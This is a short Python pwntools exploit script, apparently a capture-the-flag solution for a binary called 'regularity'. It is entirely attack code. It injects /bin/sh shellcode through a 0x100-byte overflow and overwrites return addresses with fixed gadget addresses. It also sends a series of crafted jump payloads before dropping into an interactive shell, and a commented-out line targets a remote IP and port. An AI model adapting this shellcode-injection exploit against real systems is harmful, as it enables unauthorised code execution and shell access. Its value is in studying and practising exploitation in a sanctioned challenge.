from pwn import *
from pwnlib.util.cyclic import cyclic_gen
from pwnlib.util.fiddling import enhex, xor
from struct import pack
from pwnlib import shellcraft
from pwnlib.asm import asm

p = None

def run():
    global p
    chall = "./regularity"
    context.binary = chall
    context.log_level = 'debug'
    p = process(chall)
#    p = remote("94.237.59.230", "43639")
    elf = ELF(chall)
#    libc = ELF("libc-2.31.so")

    sc = asm(shellcraft.sh())

    payload = b''
    payload += sc
    payload += b'a'*(0x100-len(payload))
    payload += p64(0x401052)

    p.sendafter(b"days?\n", payload)

    payload = b''
    payload += p64(0x401052)*0x22
    p.send(payload)

    for i in range(0x16):
        payload = b''
        payload += p64(0x40104b)*0x22
        p.send(payload)

    payload = b''
    payload += p64(0x40104b)*0x21
    p.send(payload)

    payload = b''
    for i in range(0x20):
        payload += (b'\xe9'+pack('<i',-0x2cd-i*8)+b'\x00'*3)
    payload += b'\x00'
    p.send(payload)

    p.interactive()

if __name__ == "__main__":
    run()